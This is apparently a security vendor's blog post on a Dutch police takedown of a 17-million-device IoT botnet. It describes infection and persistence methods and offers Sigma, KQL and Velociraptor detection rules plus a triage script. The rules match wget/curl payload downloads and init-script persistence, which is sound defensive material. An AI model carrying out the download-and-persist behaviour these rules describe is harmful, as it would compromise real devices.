Back to Intelligence

Dutch Botnet Takedown: Detecting and Remediating the 17-Million Device IoT Worm

SA
Security Arsenal Team
May 29, 2026
6 min read

In a significant operation against cybercrime, Dutch authorities have dismantled a massive botnet comprising approximately 17 million infected devices. The operation, which resulted in the seizure of over 200 servers from a local provider, targeted the infrastructure used to control this sprawling network of compromised machines. While the command-and-control (C2) servers have been taken offline, the infected devices—ranging from home routers to IoT endpoints—remain compromised.

For security practitioners, this is not a time for complacency. The disruption of the C2 temporarily neutralizes the threat actor's ability to issue commands (e.g., DDoS attacks or data exfiltration), but the malware persistence mechanisms remain active on the endpoints. If the actors regain infrastructure or copy the C2 domain to a new sinkhole, the botnet can be resurrected. Defenders must act now to identify infected nodes, eradicate the malware, and close the vulnerability gaps that allowed the initial infection.

Technical Analysis

Threat Overview

The disruption targets a large-scale IoT botnet, exhibiting characteristics consistent with families like Mozi or Mirai. These botnets typically target Linux-based embedded systems (MIPS, ARM, SH4 architectures) found in routers, DVRs, and IP cameras. The infection vector usually involves:

  1. Exploitation of Vulnerabilities: Targeting unpatched firmware vulnerabilities (e.g., CVE-2023-1389, CVE-2022-26258) in web interfaces or UPnP services.
  2. Brute Force: Utilizing default or weak credentials on Telnet/SSH services.

Affected Platforms

  • Operating Systems: Embedded Linux distributions (BusyBox-based).
  • Hardware: SOHO/SMB Routers, Wireless Access Points, IoT Cameras, Digital Video Recorders (DVRs).

Exploitation Mechanism

Once a device is compromised, the malware typically performs the following actions:

  • Payload Drop: Downloads a binary (ELF executable) to a writable directory (e.g., /tmp, /var, /dev/shm).
  • Persistence: Copies the binary to a permanent location and adds an entry to crontab, /etc/inittab, or creates an init script in /etc/init.d/ to ensure execution upon reboot.
  • C2 Communication: Connects to the controller server (often via raw TCP or HTTP) to receive instructions. Some variants use Distributed Hash Tables (DHT) to hide the C2.

Exploitation Status

  • In-the-Wild: Confirmed active exploitation; the scale of the takedown (17M devices) proves widespread successful infection.
  • Remediation Status: While the Dutch police have disrupted the C2, patching the devices is the only permanent remediation. Many infected devices are consumer-grade and difficult to patch remotely, often requiring a factory reset and firmware update.

Detection & Response

Sigma Rules

The following Sigma rules focus on the behavioral indicators typical of IoT/Linux botnets: downloading executables from suspicious locations and setting persistence in common init paths.

YAML
---
title: Suspicious Linux Executable Download via Curl/Wget
id: a1b2c3d4-5678-90ab-cdef-123456789abc
status: experimental
description: Detects the download of executable files from the internet using wget or curl, a common step in IoT botnet infection chains.
references:
 - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2024/05/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/wget'
      - '/curl'
    CommandLine|contains:
      - 'http'
      - 'ftp'
  condition: selection
falsepositives:
  - Legitimate software updates
  - Administrative downloads
level: high
---
title: Linux Persistence via Init Script Creation
id: b2c3d4e5-6789-01ab-cdef-234567890bcd
status: experimental
description: Detects the creation of new scripts in /etc/init.d/ or modification of rc.local, common persistence mechanisms for Linux botnets.
references:
  - https://attack.mitre.org/techniques/T1543/
author: Security Arsenal
date: 2024/05/06
tags:
  - attack.persistence
  - attack.t1543.001
logsource:
  category: file_creation
  product: linux
detection:
  selection:
    TargetFilename|startswith:
      - '/etc/init.d/'
      - '/etc/rc.d/'
    TargetFilename|endswith:
      - '.sh'
      - '.run'
  condition: selection
falsepositives:
  - Legitimate software installation
  - System administration scripts
level: medium

KQL (Microsoft Sentinel)

This query hunts for Linux devices logging connections to known bad IPs or exhibiting high-volume outbound connection patterns indicative of scanning/ C2 activity. It assumes Linux Syslog or CommonSecurityLog data ingestion.

KQL — Microsoft Sentinel / Defender
// Hunt for suspicious outbound connections from Linux endpoints
let SuspiciousPorts = dynamic([23, 2323, 80, 8080, 5555, 6667, 8443]);
CommonSecurityLog
| where DeviceVendor in ("Cisco", "Juniper", "Fortinet", "Palo Alto") 
| where DestinationPort in (SuspiciousPorts)
| where Activity == "Allowed"
| extend SourceIP = SourceAddress, DestIP = DestinationAddress
| project TimeGenerated, SourceIP, DestIP, DestinationPort, DeviceAction, ApplicationProtocol
| summarize count() by DestIP, DestinationPort, bin(TimeGenerated, 5m)
| where count_ > 10 // Threshold for scanning/botnet activity
| sort by count_ desc

Velociraptor VQL

This artifact hunts for the presence of suspicious ELF binaries in writable temporary directories, a hallmark of IoT malware memory-only execution or staging.

VQL — Velociraptor
-- Hunt for suspicious executables in writable directories
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs='/tmp/*', '/var/tmp/*', '/dev/shm/*')
WHERE Mode =~ 'x' -- Executable bit set
   AND Name NOT IN ('.', '..')
   AND Size > 10000 -- Filter out small text files/pipes

Remediation Script (Bash)

This script assists in identifying common Linux botnet processes and network connections on compromised IoT devices.

Bash / Shell
#!/bin/bash
# Remediation Script for Linux IoT Botnet Infection
# Usage: ./remediate_iot.sh

echo "[+] Checking for suspicious processes..."
# Common botnet process names (Mozi, Mirai variants use random names, check paths)
SUSPICIOUS_PROCS=$(ps aux | grep -E '(wget|curl|tftp|busybox)' | grep -E '(/tmp|/var|/dev/shm)' | grep -v grep)
if [ -n "$SUSPICIOUS_PROCS" ]; then
    echo "[!] Suspicious processes found:"
    echo "$SUSPICIOUS_PROCS"
    echo "[!] Warning: Manual review required before killing to avoid service disruption."
else
    echo "[?] No obvious suspicious processes running in tmp dirs."
fi

echo "[+] Checking for listening non-standard ports..."
# Listening ports excluding standard http/ssh/dns
netstat -tulpen | grep LISTEN | awk '{print $4}' | cut -d: -f2 | sort -u | while read port; do
    if [ "$port" -gt 1024 ]; then
        echo "Port $port is open."
        netstat -tulpen | grep ":$port " | grep LISTEN
    fi
done

echo "[+] Checking /etc/init.d/ for unusual scripts..."
ls -lat /etc/init.d/ | head -n 10

echo "[+] Remediation Steps Manual:"
echo "1. Update device firmware to the latest version."
echo "2. Change default administrative passwords."
echo "3. Disable Telnet and UPnP if not required."
echo "4. Perform a factory reset if infection cannot be confirmed removed."

Remediation

Immediate defensive actions are required to secure the edge:

  1. Firmware Updates: Identify all IoT devices and SOHO routers on the network. Check the vendor's security advisory page and apply the latest firmware updates. This patch is the primary defense against the exploitation of CVEs used in the initial compromise.
  2. Credential Hygiene: Ensure default credentials are not in use. Enforce strong, unique passwords for administrative interfaces (Web UI, SSH, Telnet).
  3. Network Segmentation: Isolate IoT devices on a separate VLAN (Zone). Restrict their communication to only necessary upstream services (e.g., NTP, DNS) and block peer-to-peer communication between IoT devices.
  4. Disable Insecure Services: Disable Telnet (use SSHv2 only) and disable Universal Plug and Play (UPnP) on edge routers to prevent unintended port forwarding.
  5. Factory Reset: For devices where infection is confirmed or suspected, and where malware removal is not feasible, perform a factory reset followed immediately by a firmware update and credential change.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwarebreach-responseforensicsdfiriot-securitybotnet-remediationlinux-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action